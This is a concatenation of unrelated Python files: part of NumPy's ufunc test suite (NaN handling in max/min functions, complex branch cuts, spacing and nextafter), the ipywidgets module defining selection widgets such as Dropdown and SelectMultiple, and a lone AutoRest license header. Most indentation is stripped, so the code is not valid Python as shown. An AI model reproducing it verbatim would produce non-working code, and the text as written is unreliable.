def test_complex_nans(self):
nan = np.nan
for cnan in [complex(nan, 0), complex(0, nan), complex(nan, nan)] :
arg1 = np.array([0, cnan, cnan], dtype=np.complex)
arg2 = np.array([cnan, 0, cnan], dtype=np.complex)
out = np.array([nan, nan, nan], dtype=np.complex)
assert_equal(np.maximum(arg1, arg2), out)
class TestMinimum(TestCase):
def test_reduce(self):
dflt = np.typecodes['AllFloat']
dint = np.typecodes['AllInteger']
seq1 = np.arange(11)
seq2 = seq1[::-1]
func = np.minimum.reduce
for dt in dint:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 0)
assert_equal(func(tmp2), 0)
for dt in dflt:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 0)
assert_equal(func(tmp2), 0)
tmp1[::2] = np.nan
tmp2[::2] = np.nan
assert_equal(func(tmp1), np.nan)
assert_equal(func(tmp2), np.nan)
def test_reduce_complex(self):
assert_equal(np.minimum.reduce([1,2j]),2j)
assert_equal(np.minimum.reduce([1+3j,2j]),2j)
def test_float_nans(self):
nan = np.nan
arg1 = np.array([0, nan, nan])
arg2 = np.array([nan, 0, nan])
out = np.array([nan, nan, nan])
assert_equal(np.minimum(arg1, arg2), out)
def test_complex_nans(self):
nan = np.nan
for cnan in [complex(nan, 0), complex(0, nan), complex(nan, nan)] :
arg1 = np.array([0, cnan, cnan], dtype=np.complex)
arg2 = np.array([cnan, 0, cnan], dtype=np.complex)
out = np.array([nan, nan, nan], dtype=np.complex)
assert_equal(np.minimum(arg1, arg2), out)
class TestFmax(TestCase):
def test_reduce(self):
dflt = np.typecodes['AllFloat']
dint = np.typecodes['AllInteger']
seq1 = np.arange(11)
seq2 = seq1[::-1]
func = np.fmax.reduce
for dt in dint:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 10)
assert_equal(func(tmp2), 10)
for dt in dflt:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 10)
assert_equal(func(tmp2), 10)
tmp1[::2] = np.nan
tmp2[::2] = np.nan
assert_equal(func(tmp1), 9)
assert_equal(func(tmp2), 9)
def test_reduce_complex(self):
assert_equal(np.fmax.reduce([1,2j]),1)
assert_equal(np.fmax.reduce([1+3j,2j]),1+3j)
def test_float_nans(self):
nan = np.nan
arg1 = np.array([0, nan, nan])
arg2 = np.array([nan, 0, nan])
out = np.array([0, 0, nan])
assert_equal(np.fmax(arg1, arg2), out)
def test_complex_nans(self):
nan = np.nan
for cnan in [complex(nan, 0), complex(0, nan), complex(nan, nan)] :
arg1 = np.array([0, cnan, cnan], dtype=np.complex)
arg2 = np.array([cnan, 0, cnan], dtype=np.complex)
out = np.array([0, 0, nan], dtype=np.complex)
assert_equal(np.fmax(arg1, arg2), out)
class TestFmin(TestCase):
def test_reduce(self):
dflt = np.typecodes['AllFloat']
dint = np.typecodes['AllInteger']
seq1 = np.arange(11)
seq2 = seq1[::-1]
func = np.fmin.reduce
for dt in dint:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 0)
assert_equal(func(tmp2), 0)
for dt in dflt:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 0)
assert_equal(func(tmp2), 0)
tmp1[::2] = np.nan
tmp2[::2] = np.nan
assert_equal(func(tmp1), 1)
assert_equal(func(tmp2), 1)
def test_reduce_complex(self):
assert_equal(np.fmin.reduce([1,2j]),2j)
assert_equal(np.fmin.reduce([1+3j,2j]),2j)
def test_float_nans(self):
nan = np.nan
arg1 = np.array([0, nan, nan])
arg2 = np.array([nan, 0, nan])
out = np.array([0, 0, nan])
assert_equal(np.fmin(arg1, arg2), out)
def test_complex_nans(self):
nan = np.nan
for cnan in [complex(nan, 0), complex(0, nan), complex(nan, nan)] :
arg1 = np.array([0, cnan, cnan], dtype=np.complex)
arg2 = np.array([cnan, 0, cnan], dtype=np.complex)
out = np.array([0, 0, nan], dtype=np.complex)
assert_equal(np.fmin(arg1, arg2), out)
class TestFloatingPoint(TestCase):
def test_floating_point(self):
assert_equal(ncu.FLOATING_POINT_SUPPORT, 1)
class TestDegrees(TestCase):
def test_degrees(self):
assert_almost_equal(ncu.degrees(np.pi), 180.0)
assert_almost_equal(ncu.degrees(-0.5*np.pi), -90.0)
class TestRadians(TestCase):
def test_radians(self):
assert_almost_equal(ncu.radians(180.0), np.pi)
assert_almost_equal(ncu.radians(-90.0), -0.5*np.pi)
class TestSign(TestCase):
def test_sign(self):
a = np.array([np.inf, -np.inf, np.nan, 0.0, 3.0, -3.0])
out = np.zeros(a.shape)
tgt = np.array([1., -1., np.nan, 0.0, 1.0, -1.0])
olderr = np.seterr(invalid='ignore')
try:
res = ncu.sign(a)
assert_equal(res, tgt)
res = ncu.sign(a, out)
assert_equal(res, tgt)
assert_equal(out, tgt)
finally:
np.seterr(**olderr)
class TestSpecialMethods(TestCase):
def test_wrap(self):
class with_wrap(object):
def __array__(self):
return np.zeros(1)
def __array_wrap__(self, arr, context):
r = with_wrap()
r.arr = arr
r.context = context
return r
a = with_wrap()
x = ncu.minimum(a, a)
assert_equal(x.arr, np.zeros(1))
func, args, i = x.context
self.assertTrue(func is ncu.minimum)
self.assertEqual(len(args), 2)
assert_equal(args[0], a)
assert_equal(args[1], a)
self.assertEqual(i, 0)
def test_wrap_with_iterable(self):
# test fix for bug #1026:
class with_wrap(np.ndarray):
__array_priority__ = 10
def __new__(cls):
return np.asarray(1).view(cls).copy()
def __array_wrap__(self, arr, context):
return arr.view(type(self))
a = with_wrap()
x = ncu.multiply(a, (1, 2, 3))
self.assertTrue(isinstance(x, with_wrap))
assert_array_equal(x, np.array((1, 2, 3)))
def test_priority_with_scalar(self):
# test fix for bug #826:
class A(np.ndarray):
__array_priority__ = 10
def __new__(cls):
return np.asarray(1.0, 'float64').view(cls).copy()
a = A()
x = np.float64(1)*a
self.assertTrue(isinstance(x, A))
assert_array_equal(x, np.array(1))
def test_old_wrap(self):
class with_wrap(object):
def __array__(self):
return np.zeros(1)
def __array_wrap__(self, arr):
r = with_wrap()
r.arr = arr
return r
a = with_wrap()
x = ncu.minimum(a, a)
assert_equal(x.arr, np.zeros(1))
def test_priority(self):
class A(object):
def __array__(self):
return np.zeros(1)
def __array_wrap__(self, arr, context):
r = type(self)()
r.arr = arr
r.context = context
return r
class B(A):
__array_priority__ = 20.
class C(A):
__array_priority__ = 40.
x = np.zeros(1)
a = A()
b = B()
c = C()
f = ncu.minimum
self.assertTrue(type(f(x,x)) is np.ndarray)
self.assertTrue(type(f(x,a)) is A)
self.assertTrue(type(f(x,b)) is B)
self.assertTrue(type(f(x,c)) is C)
self.assertTrue(type(f(a,x)) is A)
self.assertTrue(type(f(b,x)) is B)
self.assertTrue(type(f(c,x)) is C)
self.assertTrue(type(f(a,a)) is A)
self.assertTrue(type(f(a,b)) is B)
self.assertTrue(type(f(b,a)) is B)
self.assertTrue(type(f(b,b)) is B)
self.assertTrue(type(f(b,c)) is C)
self.assertTrue(type(f(c,b)) is C)
self.assertTrue(type(f(c,c)) is C)
        self.assertTrue(type(ncu.exp(a)) is A)
        self.assertTrue(type(ncu.exp(b)) is B)
        self.assertTrue(type(ncu.exp(c)) is C)
def test_failing_wrap(self):
class A(object):
def __array__(self):
return np.zeros(1)
def __array_wrap__(self, arr, context):
raise RuntimeError
a = A()
self.assertRaises(RuntimeError, ncu.maximum, a, a)
def test_default_prepare(self):
class with_wrap(object):
__array_priority__ = 10
def __array__(self):
return np.zeros(1)
def __array_wrap__(self, arr, context):
return arr
a = with_wrap()
x = ncu.minimum(a, a)
assert_equal(x, np.zeros(1))
assert_equal(type(x), np.ndarray)
def test_prepare(self):
class with_prepare(np.ndarray):
__array_priority__ = 10
def __array_prepare__(self, arr, context):
                # make sure we can return a new array of the requested subclass
return np.array(arr).view(type=with_prepare)
a = np.array(1).view(type=with_prepare)
x = np.add(a, a)
assert_equal(x, np.array(2))
assert_equal(type(x), with_prepare)
def test_failing_prepare(self):
class A(object):
def __array__(self):
return np.zeros(1)
def __array_prepare__(self, arr, context=None):
raise RuntimeError
a = A()
self.assertRaises(RuntimeError, ncu.maximum, a, a)
def test_array_with_context(self):
class A(object):
def __array__(self, dtype=None, context=None):
func, args, i = context
self.func = func
self.args = args
self.i = i
return np.zeros(1)
class B(object):
def __array__(self, dtype=None):
return np.zeros(1, dtype)
class C(object):
def __array__(self):
return np.zeros(1)
a = A()
ncu.maximum(np.zeros(1), a)
self.assertTrue(a.func is ncu.maximum)
assert_equal(a.args[0], 0)
self.assertTrue(a.args[1] is a)
self.assertTrue(a.i == 1)
assert_equal(ncu.maximum(a, B()), 0)
assert_equal(ncu.maximum(a, C()), 0)
class TestChoose(TestCase):
def test_mixed(self):
c = np.array([True,True])
a = np.array([True,True])
assert_equal(np.choose(c, (a, 1)), np.array([1,1]))
def is_longdouble_finfo_bogus():
info = np.finfo(np.longcomplex)
return not np.isfinite(np.log10(info.tiny/info.eps))
class TestComplexFunctions(object):
funcs = [np.arcsin, np.arccos, np.arctan, np.arcsinh, np.arccosh,
np.arctanh, np.sin, np.cos, np.tan, np.exp,
np.exp2, np.log, np.sqrt, np.log10, np.log2,
np.log1p]
def test_it(self):
for f in self.funcs:
if f is np.arccosh :
x = 1.5
else :
x = .5
fr = f(x)
fz = f(np.complex(x))
assert_almost_equal(fz.real, fr, err_msg='real part %s'%f)
assert_almost_equal(fz.imag, 0., err_msg='imag part %s'%f)
def test_precisions_consistent(self) :
z = 1 + 1j
for f in self.funcs :
fcf = f(np.csingle(z))
fcd = f(np.cdouble(z))
fcl = f(np.clongdouble(z))
            assert_almost_equal(fcf, fcd, decimal=6, err_msg='fcf-fcd %s'%f)
            assert_almost_equal(fcl, fcd, decimal=15, err_msg='fcl-fcd %s'%f)
def test_branch_cuts(self):
# check branch cuts and continuity on them
yield _check_branch_cut, np.log, -0.5, 1j, 1, -1
yield _check_branch_cut, np.log2, -0.5, 1j, 1, -1
yield _check_branch_cut, np.log10, -0.5, 1j, 1, -1
yield _check_branch_cut, np.log1p, -1.5, 1j, 1, -1
yield _check_branch_cut, np.sqrt, -0.5, 1j, 1, -1
yield _check_branch_cut, np.arcsin, [ -2, 2], [1j, -1j], 1, -1
yield _check_branch_cut, np.arccos, [ -2, 2], [1j, -1j], 1, -1
yield _check_branch_cut, np.arctan, [-2j, 2j], [1, -1 ], -1, 1
yield _check_branch_cut, np.arcsinh, [-2j, 2j], [-1, 1], -1, 1
yield _check_branch_cut, np.arccosh, [ -1, 0.5], [1j, 1j], 1, -1
yield _check_branch_cut, np.arctanh, [ -2, 2], [1j, -1j], 1, -1
# check against bogus branch cuts: assert continuity between quadrants
yield _check_branch_cut, np.arcsin, [-2j, 2j], [ 1, 1], 1, 1
yield _check_branch_cut, np.arccos, [-2j, 2j], [ 1, 1], 1, 1
yield _check_branch_cut, np.arctan, [ -2, 2], [1j, 1j], 1, 1
yield _check_branch_cut, np.arcsinh, [ -2, 2, 0], [1j, 1j, 1 ], 1, 1
yield _check_branch_cut, np.arccosh, [-2j, 2j, 2], [1, 1, 1j], 1, 1
yield _check_branch_cut, np.arctanh, [-2j, 2j, 0], [1, 1, 1j], 1, 1
@dec.knownfailureif(True, "These branch cuts are known to fail")
def test_branch_cuts_failing(self):
# XXX: signed zero not OK with ICC on 64-bit platform for log, see
# http://permalink.gmane.org/gmane.comp.python.numeric.general/25335
yield _check_branch_cut, np.log, -0.5, 1j, 1, -1, True
yield _check_branch_cut, np.log2, -0.5, 1j, 1, -1, True
yield _check_branch_cut, np.log10, -0.5, 1j, 1, -1, True
yield _check_branch_cut, np.log1p, -1.5, 1j, 1, -1, True
# XXX: signed zeros are not OK for sqrt or for the arc* functions
yield _check_branch_cut, np.sqrt, -0.5, 1j, 1, -1, True
yield _check_branch_cut, np.arcsin, [ -2, 2], [1j, -1j], 1, -1, True
yield _check_branch_cut, np.arccos, [ -2, 2], [1j, -1j], 1, -1, True
yield _check_branch_cut, np.arctan, [-2j, 2j], [1, -1 ], -1, 1, True
yield _check_branch_cut, np.arcsinh, [-2j, 2j], [-1, 1], -1, 1, True
yield _check_branch_cut, np.arccosh, [ -1, 0.5], [1j, 1j], 1, -1, True
yield _check_branch_cut, np.arctanh, [ -2, 2], [1j, -1j], 1, -1, True
def test_against_cmath(self):
import cmath, sys
# cmath.asinh is broken in some versions of Python, see
# http://bugs.python.org/issue1381
broken_cmath_asinh = False
if sys.version_info < (2,6):
broken_cmath_asinh = True
points = [-1-1j, -1+1j, +1-1j, +1+1j]
name_map = {'arcsin': 'asin', 'arccos': 'acos', 'arctan': 'atan',
'arcsinh': 'asinh', 'arccosh': 'acosh', 'arctanh': 'atanh'}
atol = 4*np.finfo(np.complex).eps
for func in self.funcs:
fname = func.__name__.split('.')[-1]
cname = name_map.get(fname, fname)
try:
cfunc = getattr(cmath, cname)
except AttributeError:
continue
for p in points:
a = complex(func(np.complex_(p)))
b = cfunc(p)
if cname == 'asinh' and broken_cmath_asinh:
continue
assert abs(a - b) < atol, "%s %s: %s; cmath: %s"%(fname,p,a,b)
def check_loss_of_precision(self, dtype):
"""Check loss of precision in complex arc* functions"""
# Check against known-good functions
info = np.finfo(dtype)
real_dtype = dtype(0.).real.dtype
eps = info.eps
def check(x, rtol):
x = x.astype(real_dtype)
z = x.astype(dtype)
d = np.absolute(np.arcsinh(x)/np.arcsinh(z).real - 1)
assert np.all(d < rtol), (np.argmax(d), x[np.argmax(d)], d.max(),
'arcsinh')
z = (1j*x).astype(dtype)
d = np.absolute(np.arcsinh(x)/np.arcsin(z).imag - 1)
assert np.all(d < rtol), (np.argmax(d), x[np.argmax(d)], d.max(),
'arcsin')
z = x.astype(dtype)
d = np.absolute(np.arctanh(x)/np.arctanh(z).real - 1)
assert np.all(d < rtol), (np.argmax(d), x[np.argmax(d)], d.max(),
'arctanh')
z = (1j*x).astype(dtype)
d = np.absolute(np.arctanh(x)/np.arctan(z).imag - 1)
assert np.all(d < rtol), (np.argmax(d), x[np.argmax(d)], d.max(),
'arctan')
# The switchover was chosen as 1e-3; hence there can be up to
# ~eps/1e-3 of relative cancellation error before it
x_series = np.logspace(-20, -3.001, 200)
x_basic = np.logspace(-2.999, 0, 10, endpoint=False)
if dtype is np.longcomplex:
# It's not guaranteed that the system-provided arc functions
# are accurate down to a few epsilons. (Eg. on Linux 64-bit)
# So, give more leeway for long complex tests here:
check(x_series, 50*eps)
else:
check(x_series, 2*eps)
check(x_basic, 2*eps/1e-3)
# Check a few points
z = np.array([1e-5*(1+1j)], dtype=dtype)
p = 9.999999999333333333e-6 + 1.000000000066666666e-5j
d = np.absolute(1-np.arctanh(z)/p)
assert np.all(d < 1e-15)
p = 1.0000000000333333333e-5 + 9.999999999666666667e-6j
d = np.absolute(1-np.arcsinh(z)/p)
assert np.all(d < 1e-15)
p = 9.999999999333333333e-6j + 1.000000000066666666e-5
d = np.absolute(1-np.arctan(z)/p)
assert np.all(d < 1e-15)
p = 1.0000000000333333333e-5j + 9.999999999666666667e-6
d = np.absolute(1-np.arcsin(z)/p)
assert np.all(d < 1e-15)
# Check continuity across switchover points
def check(func, z0, d=1):
z0 = np.asarray(z0, dtype=dtype)
zp = z0 + abs(z0) * d * eps * 2
zm = z0 - abs(z0) * d * eps * 2
assert np.all(zp != zm), (zp, zm)
# NB: the cancellation error at the switchover is at least eps
good = (abs(func(zp) - func(zm)) < 2*eps)
assert np.all(good), (func, z0[~good])
for func in (np.arcsinh,np.arcsinh,np.arcsin,np.arctanh,np.arctan):
pts = [rp+1j*ip for rp in (-1e-3,0,1e-3) for ip in(-1e-3,0,1e-3)
if rp != 0 or ip != 0]
check(func, pts, 1)
check(func, pts, 1j)
check(func, pts, 1+1j)
def test_loss_of_precision(self):
for dtype in [np.complex64, np.complex_]:
yield self.check_loss_of_precision, dtype
@dec.knownfailureif(is_longdouble_finfo_bogus(), "Bogus long double finfo")
def test_loss_of_precision_longcomplex(self):
self.check_loss_of_precision(np.longcomplex)
class TestAttributes(TestCase):
def test_attributes(self):
add = ncu.add
assert_equal(add.__name__, 'add')
assert add.__doc__.startswith('add(x1, x2[, out])\n\n')
self.assertTrue(add.ntypes >= 18) # don't fail if types added
self.assertTrue('ii->i' in add.types)
assert_equal(add.nin, 2)
assert_equal(add.nout, 1)
assert_equal(add.identity, 0)
class TestSubclass(TestCase):
def test_subclass_op(self):
class simple(np.ndarray):
def __new__(subtype, shape):
self = np.ndarray.__new__(subtype, shape, dtype=object)
self.fill(0)
return self
a = simple((3,4))
assert_equal(a+a, a)
def _check_branch_cut(f, x0, dx, re_sign=1, im_sign=-1, sig_zero_ok=False,
dtype=np.complex):
"""
Check for a branch cut in a function.
Assert that `x0` lies on a branch cut of function `f` and `f` is
continuous from the direction `dx`.
Parameters
----------
f : func
Function to check
x0 : array-like
Point on branch cut
dx : array-like
Direction to check continuity in
re_sign, im_sign : {1, -1}
Change of sign of the real or imaginary part expected
sig_zero_ok : bool
Whether to check if the branch cut respects signed zero (if applicable)
dtype : dtype
Dtype to check (should be complex)
"""
x0 = np.atleast_1d(x0).astype(dtype)
dx = np.atleast_1d(dx).astype(dtype)
scale = np.finfo(dtype).eps * 1e3
atol = 1e-4
y0 = f(x0)
yp = f(x0 + dx*scale*np.absolute(x0)/np.absolute(dx))
ym = f(x0 - dx*scale*np.absolute(x0)/np.absolute(dx))
assert np.all(np.absolute(y0.real - yp.real) < atol), (y0, yp)
assert np.all(np.absolute(y0.imag - yp.imag) < atol), (y0, yp)
assert np.all(np.absolute(y0.real - ym.real*re_sign) < atol), (y0, ym)
assert np.all(np.absolute(y0.imag - ym.imag*im_sign) < atol), (y0, ym)
if sig_zero_ok:
# check that signed zeros also work as a displacement
jr = (x0.real == 0) & (dx.real != 0)
ji = (x0.imag == 0) & (dx.imag != 0)
x = -x0
x.real[jr] = 0.*dx.real
x.imag[ji] = 0.*dx.imag
x = -x
ym = f(x)
ym = ym[jr | ji]
y0 = y0[jr | ji]
assert np.all(np.absolute(y0.real - ym.real*re_sign) < atol), (y0, ym)
assert np.all(np.absolute(y0.imag - ym.imag*im_sign) < atol), (y0, ym)
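# A hedged example (not part of the original suite) of calling the helper
# above directly.  np.log has its branch cut along the negative real axis:
# approaching x0 = -0.5 from above (dx = 1j) and from below gives the same
# real part but an imaginary part of opposite sign, hence re_sign=1,
# im_sign=-1 -- the same arguments yielded by test_branch_cuts above.
def _example_check_branch_cut():
    _check_branch_cut(np.log, x0=-0.5, dx=1j, re_sign=1, im_sign=-1)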
def test_copysign():
assert np.copysign(1, -1) == -1
old_err = np.seterr(divide="ignore")
try:
assert 1 / np.copysign(0, -1) < 0
assert 1 / np.copysign(0, 1) > 0
finally:
np.seterr(**old_err)
assert np.signbit(np.copysign(np.nan, -1))
assert not np.signbit(np.copysign(np.nan, 1))
def _test_nextafter(t):
one = t(1)
two = t(2)
zero = t(0)
eps = np.finfo(t).eps
assert np.nextafter(one, two) - one == eps
assert np.nextafter(one, zero) - one < 0
assert np.isnan(np.nextafter(np.nan, one))
assert np.isnan(np.nextafter(one, np.nan))
assert np.nextafter(one, one) == one
def test_nextafter():
return _test_nextafter(np.float64)
def test_nextafterf():
return _test_nextafter(np.float32)
@dec.knownfailureif(sys.platform == 'win32' or
("powerpc" in platform.processor()),
"Long double support buggy on win32 and PPC.")
def test_nextafterl():
return _test_nextafter(np.longdouble)
def _test_spacing(t):
err = np.seterr(invalid='ignore')
one = t(1)
eps = np.finfo(t).eps
nan = t(np.nan)
inf = t(np.inf)
try:
assert np.spacing(one) == eps
assert np.isnan(np.spacing(nan))
assert np.isnan(np.spacing(inf))
assert np.isnan(np.spacing(-inf))
assert np.spacing(t(1e30)) != 0
finally:
np.seterr(**err)
def test_spacing():
return _test_spacing(np.float64)
def test_spacingf():
return _test_spacing(np.float32)
@dec.knownfailureif(sys.platform == 'win32' or
("powerpc" in platform.processor()),
"Long double support buggy on win32 and PPC.")
def test_spacingl():
return _test_spacing(np.longdouble)
def test_spacing_gfortran():
# Reference from this fortran file, built with gfortran 4.3.3 on linux
# 32bits:
# PROGRAM test_spacing
# INTEGER, PARAMETER :: SGL = SELECTED_REAL_KIND(p=6, r=37)
# INTEGER, PARAMETER :: DBL = SELECTED_REAL_KIND(p=13, r=200)
#
# WRITE(*,*) spacing(0.00001_DBL)
# WRITE(*,*) spacing(1.0_DBL)
# WRITE(*,*) spacing(1000._DBL)
# WRITE(*,*) spacing(10500._DBL)
#
# WRITE(*,*) spacing(0.00001_SGL)
# WRITE(*,*) spacing(1.0_SGL)
# WRITE(*,*) spacing(1000._SGL)
# WRITE(*,*) spacing(10500._SGL)
# END PROGRAM
ref = {}
ref[np.float64] = [1.69406589450860068E-021,
2.22044604925031308E-016,
1.13686837721616030E-013,
1.81898940354585648E-012]
ref[np.float32] = [
9.09494702E-13,
1.19209290E-07,
6.10351563E-05,
9.76562500E-04]
    for dt, dec_ in zip([np.float32, np.float64], (10, 20)):
        x = np.array([1e-5, 1, 1000, 10500], dtype=dt)
        assert_array_almost_equal(np.spacing(x), ref[dt], decimal=dec_)
def test_nextafter_vs_spacing():
# XXX: spacing does not handle long double yet
for t in [np.float32, np.float64]:
for _f in [1, 1e-5, 1000]:
f = t(_f)
f1 = t(_f + 1)
assert np.nextafter(f, f1) - f == np.spacing(f)
def test_pos_nan():
"""Check np.nan is a positive nan."""
assert np.signbit(np.nan) == 0
def test_reduceat():
"""Test bug in reduceat when structured arrays are not copied."""
db = np.dtype([('name', 'S11'),('time', np.int64), ('value', np.float32)])
a = np.empty([100], dtype=db)
a['name'] = 'Simple'
a['time'] = 10
a['value'] = 100
indx = [0,7,15,25]
h2 = []
val1 = indx[0]
for val2 in indx[1:]:
h2.append(np.add.reduce(a['value'][val1:val2]))
val1 = val2
h2.append(np.add.reduce(a['value'][val1:]))
h2 = np.array(h2)
# test buffered -- this should work
h1 = np.add.reduceat(a['value'], indx)
assert_array_almost_equal(h1, h2)
# This is when the error occurs.
# test no buffer
res = np.setbufsize(32)
h1 = np.add.reduceat(a['value'], indx)
np.setbufsize(np.UFUNC_BUFSIZE_DEFAULT)
assert_array_almost_equal(h1, h2)
def test_complex_nan_comparisons():
nans = [complex(np.nan, 0), complex(0, np.nan), complex(np.nan, np.nan)]
fins = [complex(1, 0), complex(-1, 0), complex(0, 1), complex(0, -1),
complex(1, 1), complex(-1, -1), complex(0, 0)]
for x in nans + fins:
x = np.array([x])
for y in nans + fins:
y = np.array([y])
if np.isfinite(x) and np.isfinite(y):
continue
assert_equal(x < y, False, err_msg="%r < %r" % (x, y))
assert_equal(x > y, False, err_msg="%r > %r" % (x, y))
assert_equal(x <= y, False, err_msg="%r <= %r" % (x, y))
assert_equal(x >= y, False, err_msg="%r >= %r" % (x, y))
assert_equal(x == y, False, err_msg="%r == %r" % (x, y))
if __name__ == "__main__":
run_module_suite()
|
|
"""Selection classes.
Represents an enumeration using a widget.
"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from collections import OrderedDict
from .domwidget import DOMWidget
from .widget import register
from traitlets import (Unicode, Bool, Any, Dict, TraitError, CaselessStrEnum,
Tuple, List, Union, observe, validate)
from ipython_genutils.py3compat import unicode_type
def _value_to_label(value, obj):
options = obj._make_options(obj.options)
return next((k for k, v in options if obj.equals(v, value)), '')
def _label_to_value(k, obj):
return obj._options_dict[k]
class _Selection(DOMWidget):
"""Base class for Selection widgets
``options`` can be specified as a list or dict. If given as a list,
it will be transformed to a dict of the form ``{unicode_type(value): value}``.
When programmatically setting the value, a reverse lookup is performed
among the options to check that the value is valid. The reverse lookup uses
the equality operator by default, but another predicate may be provided via
the ``equals`` keyword argument. For example, when dealing with numpy arrays,
one may set equals=np.array_equal.
"""
value = Any(help="Selected value").tag(sync=True,
to_json=_value_to_label,
from_json=_label_to_value)
    options = Union([List(), Dict()],
    help="""List of (key, value) tuples or dict of values that the user can select.
    The keys are the strings that will be displayed in the UI; the values are the
    actual Python objects those labels stand for.
    The keys are also available as _options_labels.
    """)
_options_dict = Dict(read_only=True)
_options_labels = Tuple(read_only=True).tag(sync=True)
_options_values = Tuple(read_only=True)
_model_module = Unicode('jupyter-js-widgets').tag(sync=True)
_view_module = Unicode('jupyter-js-widgets').tag(sync=True)
disabled = Bool(help="Enable or disable user changes").tag(sync=True)
description = Unicode(help="Description of the value this widget represents").tag(sync=True)
def __init__(self, *args, **kwargs):
self.equals = kwargs.pop('equals', lambda x, y: x == y)
super(_Selection, self).__init__(*args, **kwargs)
def _make_options(self, x):
# Return a list of key-value pairs where the keys are strings
# If x is a dict, convert it to list format.
if isinstance(x, (OrderedDict, dict)):
return [(unicode_type(k), v) for k, v in x.items()]
# If x is an ordinary list, use the option values as names.
for y in x:
if not isinstance(y, (list, tuple)) or len(y) < 2:
return [(unicode_type(i), i) for i in x]
# Value is already in the correct format.
return x
@validate('options')
def _validate_options(self, proposal):
"""Handles when the options tuple has been changed.
Setting options implies setting option labels from the keys of the dict.
"""
new = proposal['value']
options = self._make_options(new)
self.set_trait('_options_dict', { i[0]: i[1] for i in options })
self.set_trait('_options_labels', [ i[0] for i in options ])
self.set_trait('_options_values', [ i[1] for i in options ])
self._value_in_options()
return new
def _value_in_options(self):
# ensure that the chosen value is one of the choices
if self._options_values:
if self.value not in self._options_values:
self.value = next(iter(self._options_values))
@validate('value')
def _validate_value(self, proposal):
value = proposal['value']
if _value_to_label(value, self):
return value
else:
raise TraitError('Invalid selection')
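# A hedged sketch (not part of the original module) of the normalisation the
# docstring above describes: a dict of options becomes (label, value) pairs,
# the labels land in _options_labels / _options_dict, and assigning ``value``
# goes through the reverse lookup in _value_to_label.  Assumes a running
# kernel/comm as for any widget; the function is illustrative and never called.
def _selection_options_sketch():
    sel = _Selection(options=OrderedDict([('one', 1), ('two', 2)]))
    assert sel._options_labels == ('one', 'two')
    assert sel._options_dict == {'one': 1, 'two': 2}
    sel.value = 2                      # valid: reverse lookup finds label 'two'
    sel = _Selection(options=[3, 4])   # list form: labels are unicode_type(value)
    assert sel._options_labels == ('3', '4')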
def _values_to_labels(values, obj):
return tuple(_value_to_label(v, obj) for v in values)
def _labels_to_values(k, obj):
return tuple(_label_to_value(l, obj) for l in k)
class _MultipleSelection(_Selection):
"""Base class for MultipleSelection widgets.
As with ``_Selection``, ``options`` can be specified as a list or dict. If
given as a list, it will be transformed to a dict of the form
``{unicode_type(value): value}``.
Despite its name, the ``value`` attribute is a tuple, even if only a single
option is selected.
"""
value = Tuple(help="Selected values").tag(sync=True,
to_json=_values_to_labels, from_json=_labels_to_values)
def _value_in_options(self):
new_value = []
for v in self.value:
if v in self._options_dict.values():
new_value.append(v)
self.value = new_value
@validate('value')
def _validate_value(self, proposal):
value = proposal['value']
if all(_value_to_label(v, self) for v in value):
return value
else:
raise TraitError('Invalid selection')
@register('Jupyter.ToggleButtons')
class ToggleButtons(_Selection):
"""Group of toggle buttons that represent an enumeration.
Only one toggle button can be toggled at any point in time.
"""
_view_name = Unicode('ToggleButtonsView').tag(sync=True)
_model_name = Unicode('ToggleButtonsModel').tag(sync=True)
tooltips = List(Unicode()).tag(sync=True)
icons = List(Unicode()).tag(sync=True)
button_style = CaselessStrEnum(
values=['primary', 'success', 'info', 'warning', 'danger', ''],
default_value='', allow_none=True, help="""Use a predefined styling for
the buttons.""").tag(sync=True)
@register('Jupyter.Dropdown')
class Dropdown(_Selection):
"""Allows you to select a single item from a dropdown."""
_view_name = Unicode('DropdownView').tag(sync=True)
_model_name = Unicode('DropdownModel').tag(sync=True)
button_style = CaselessStrEnum(
values=['primary', 'success', 'info', 'warning', 'danger', ''],
default_value='', allow_none=True, help="""Use a predefined styling for
the buttons.""").tag(sync=True)
@register('Jupyter.RadioButtons')
class RadioButtons(_Selection):
"""Group of radio buttons that represent an enumeration.
Only one radio button can be toggled at any point in time.
"""
_view_name = Unicode('RadioButtonsView').tag(sync=True)
_model_name = Unicode('RadioButtonsModel').tag(sync=True)
@register('Jupyter.Select')
class Select(_Selection):
"""Listbox that only allows one item to be selected at any given time."""
_view_name = Unicode('SelectView').tag(sync=True)
_model_name = Unicode('SelectModel').tag(sync=True)
@register('Jupyter.SelectionSlider')
class SelectionSlider(_Selection):
"""Slider to select a single item from a list or dictionary."""
_view_name = Unicode('SelectionSliderView').tag(sync=True)
_model_name = Unicode('SelectionSliderModel').tag(sync=True)
orientation = CaselessStrEnum(
values=['horizontal', 'vertical'], default_value='horizontal',
allow_none=False, help="Vertical or horizontal.").tag(sync=True)
readout = Bool(True,
help="Display the current selected label next to the slider").tag(sync=True)
continuous_update = Bool(True,
help="Update the value of the widget as the user is holding the slider.").tag(sync=True)
@register('Jupyter.SelectMultiple')
class SelectMultiple(_MultipleSelection):
"""Listbox that allows many items to be selected at any given time.
    The ``value`` attribute, inherited from ``_MultipleSelection``, holds the
    currently selected option values; assign it a list-like object (it is
    stored as a tuple).
"""
_view_name = Unicode('SelectMultipleView').tag(sync=True)
_model_name = Unicode('SelectMultipleModel').tag(sync=True)
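# Hedged usage sketch (not part of the module): the concrete widgets above are
# built from ``options`` plus their own view/model names.  Labels and values
# below are placeholders; as for any widget this assumes a running kernel.
def _selection_widgets_sketch():
    dd = Dropdown(options={'Linux': 1, 'Windows': 2}, value=2,
                  description='OS:')
    sm = SelectMultiple(options=['apples', 'oranges', 'pears'],
                        value=('apples',))   # value is a tuple of chosen values
    return dd, sm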
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
